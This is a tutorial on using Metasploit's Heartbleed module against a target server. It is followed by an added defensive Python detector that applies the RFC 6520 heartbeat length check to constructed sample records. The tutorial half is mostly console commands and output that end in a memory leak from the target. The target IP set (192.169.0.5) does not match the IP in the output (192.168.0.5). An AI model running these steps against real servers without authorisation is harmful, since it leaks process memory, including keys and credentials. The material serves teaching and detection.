A simple tutorial on how to exploit the Heartbleed OpenSSL bug using Metasploit

## Launch the Metasploit Framework console

```
root@kali:~# msfconsole
```

## Search for the Heartbleed modules

```
msf > search heartbleed

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  OpenSSL Heartbeat (Heartbleed) Information Leak
   auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
```

## Use the Heartbleed scanner module and run the show options command

```
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             443              yes       The target port
   STATUS_EVERY      5                yes       How many retries until status
   THREADS           1                yes       The number of concurrent threads
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability
```

## Set RHOSTS to your target IP

```
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.169.0.5
RHOSTS => 192.169.0.5
```

## Set verbose mode to true

```
msf auxiliary(openssl_heartbleed) > set verbose true
verbose => true
```

## Now exploit the target

```
msf auxiliary(openssl_heartbleed) > exploit

[*] 192.168.0.5:443 - Sending Client Hello...
[*] 192.168.0.5:443 - SSL record #1:
[*] 192.168.0.5:443 -     Type:    22
[*] 192.168.0.5:443 -     Version: 0x0301
[*] 192.168.0.5:443 -     Length:  86
[*] 192.168.0.5:443 -     Handshake #1:
[*] 192.168.0.5:443 -         Length: 82
[*] 192.168.0.5:443 -         Type:   Server Hello (2)
[*] 192.168.0.5:443 -         Server Hello Version:           0x0301
[*] 192.168.0.5:443 -         Server Hello random data:       57670028c2586feab7b89acb206737fb5a3c266668740367834100a7049f80c8
[*] 192.168.0.5:443 -         Server Hello Session ID length: 32
[*] 192.168.0.5:443 -         Server Hello Session ID:        34fd54aeab97d916e4b3fa0526dad8962efff7b19b22a15a94811d1730a08a94
[*] 192.168.0.5:443 - SSL record #2:
[*] 192.168.0.5:443 -     Type:    22
[*] 192.168.0.5:443 -     Version: 0x0301
[*] 192.168.0.5:443 -     Length:  5329
[*] 192.168.0.5:443 -     Handshake #1:
[*] 192.168.0.5:443 -         Length: 5325
[*] 192.168.0.5:443 -         Type:   Certificate Data (11)
[*] 192.168.0.5:443 -         Certificates length: 5322
[*] 192.168.0.5:443 -         Data length: 5325
[*] 192.168.0.5:443 -         Certificate #1:
[*] 192.168.0.5:443 -             Certificate #1: Length: 1893
[*] 192.168.0.5:443 -             Certificate #1: #, issuer=#, serial=#, not_before=2015-10-07 02:26:39 UTC, not_after=2017-10-02 02:36:38 UTC>
[*] 192.168.0.5:443 -         Certificate #2:
[*] 192.168.0.5:443 -             Certificate #2: Length: 1236
[*] 192.168.0.5:443 -             Certificate #2: #, issuer=#, serial=#, not_before=2011-05-03 07:00:00 UTC, not_after=2031-05-03 07:00:00 UTC>
[*] 192.168.0.5:443 -         Certificate #3:
[*] 192.168.0.5:443 -             Certificate #3: Length: 1153
[*] 192.168.0.5:443 -             Certificate #3: #, issuer=#, serial=#, not_before=2014-01-01 07:00:00 UTC, not_after=2031-05-30 07:00:00 UTC>
[*] 192.168.0.5:443 -         Certificate #4:
[*] 192.168.0.5:443 -             Certificate #4: Length: 1028
[*] 192.168.0.5:443 -             Certificate #4: #, issuer=#, serial=#, not_before=2004-06-29 17:06:20 UTC, not_after=2034-06-29 17:06:20 UTC>
[*] 192.168.0.5:443 - SSL record #3:
[*] 192.168.0.5:443 -     Type:    22
[*] 192.168.0.5:443 -     Version: 0x0301
[*] 192.168.0.5:443 -     Length:  331
[*] 192.168.0.5:443 -     Handshake #1:
[*] 192.168.0.5:443 -         Length: 327
[*] 192.168.0.5:443 -         Type:   Server Key Exchange (12)
[*] 192.168.0.5:443 - SSL record #4:
[*] 192.168.0.5:443 -     Type:    22
[*] 192.168.0.5:443 -     Version: 0x0301
[*] 192.168.0.5:443 -     Length:  4
[*] 192.168.0.5:443 -     Handshake #1:
[*] 192.168.0.5:443 -         Length: 0
[*] 192.168.0.5:443 -         Type:   Server Hello Done (14)
[*] 192.168.0.5:443 - Sending Heartbeat...
[*] 192.168.0.5:443 - Heartbeat response, 65535 bytes
[+] 192.168.0.5:443 - Heartbeat response with leak
```

The final line is the result that matters: the server answered a heartbeat with far more data than it was sent, which means it copied bytes out of its own process memory into the response. A patched server either ignores the oversized heartbeat or answers with only the bytes it actually received.

Thank you :)
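To make clear what the scanner is testing for, here is an added example (not code from the Metasploit module or from the original tutorial) that implements, from the defender's side, the bounds check the Heartbleed fix introduced. RFC 6520 says a heartbeat message carries a 1-byte type, a 2-byte `payload_length`, the payload, and at least 16 bytes of padding; a receiver must discard any heartbeat whose claimed length does not fit inside the TLS record. Unpatched OpenSSL trusted `payload_length` and echoed that many bytes from memory, which is why the run above reports a 65535-byte response. The function names (`parse_tls_record`, `check_heartbeat`, `scan_records`, `build_heartbeat_record`) are my own, and the sample records are constructed inline for the demonstration, not captured traffic. The same check is what an IDS rule for Heartbleed probes evaluates, so `scan_records` can be pointed at any list of raw TLS records.

```python
"""Detect malformed TLS heartbeat records (the Heartbleed condition).

Added example, not part of Metasploit or the original tutorial. It applies
the RFC 6520 section 4 length check that patched OpenSSL performs.
"""
import struct

TLS_HEARTBEAT = 24          # TLS ContentType for heartbeat records
HB_REQUEST, HB_RESPONSE = 1, 2
HB_HEADER_LEN = 3           # type (1 byte) + payload_length (2 bytes)
MIN_PADDING = 16            # RFC 6520: padding MUST be at least 16 bytes


def parse_tls_record(data: bytes):
    """Split one TLS record into (content_type, version, body).

    Raises ValueError when the 5-byte header or the body is truncated.
    """
    if len(data) < 5:
        raise ValueError("TLS record header truncated")
    content_type, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("TLS record body truncated")
    return content_type, version, body


def check_heartbeat(body: bytes) -> dict:
    """Apply the RFC 6520 bounds check to one heartbeat record body.

    'malformed' is True when a compliant receiver must discard the record.
    'overread' is how many bytes beyond the real payload a vulnerable
    server would have copied into its response (0 for a benign record).
    """
    if len(body) < HB_HEADER_LEN:
        return {"malformed": True, "reason": "heartbeat header truncated",
                "overread": 0}
    hb_type, payload_length = struct.unpack("!BH", body[:HB_HEADER_LEN])
    required = HB_HEADER_LEN + payload_length + MIN_PADDING
    present_after_header = len(body) - HB_HEADER_LEN
    return {
        "type": hb_type,
        "payload_length": payload_length,
        "record_length": len(body),
        "malformed": required > len(body),
        "reason": "payload_length does not fit record" if required > len(body) else "ok",
        "overread": max(0, payload_length - present_after_header),
    }


def scan_records(records) -> list:
    """Classify every heartbeat record in a list of raw TLS records.

    Non-heartbeat records (handshake, application data, ...) are skipped.
    """
    findings = []
    for raw in records:
        content_type, _version, body = parse_tls_record(raw)
        if content_type == TLS_HEARTBEAT:
            findings.append(check_heartbeat(body))
    return findings


def build_heartbeat_record(hb_type: int, claimed_length: int, payload: bytes,
                           padding: bytes = b"\x00" * MIN_PADDING) -> bytes:
    """Build a TLS 1.0 heartbeat record for testing the detector.

    claimed_length is written into the header as-is, so it may disagree
    with len(payload); that is how the constructed malformed samples below
    are produced.
    """
    body = struct.pack("!BH", hb_type, claimed_length) + payload + padding
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0301, len(body)) + body


# Constructed samples (hypothetical, not captured from any host):
BENIGN = build_heartbeat_record(HB_REQUEST, 5, b"hello")           # consistent lengths
OVERSIZED = build_heartbeat_record(HB_REQUEST, 0xFFFF, b"")        # claims 65535, carries 0
SHORT_PAD = build_heartbeat_record(HB_REQUEST, 5, b"hello", b"\x00" * 4)  # padding < 16

if __name__ == "__main__":
    for finding in scan_records([BENIGN, OVERSIZED, SHORT_PAD]):
        print(finding)
```

`OVERSIZED` is flagged with an `overread` of 65519 bytes: the 65535 claimed minus the 16 padding bytes that are actually present after the header, which is exactly the amount of process memory a vulnerable server would have appended to its reply. `SHORT_PAD` shows the second half of the rule: even when the payload fits, a heartbeat with less than 16 bytes of padding is discarded, although no overread would occur.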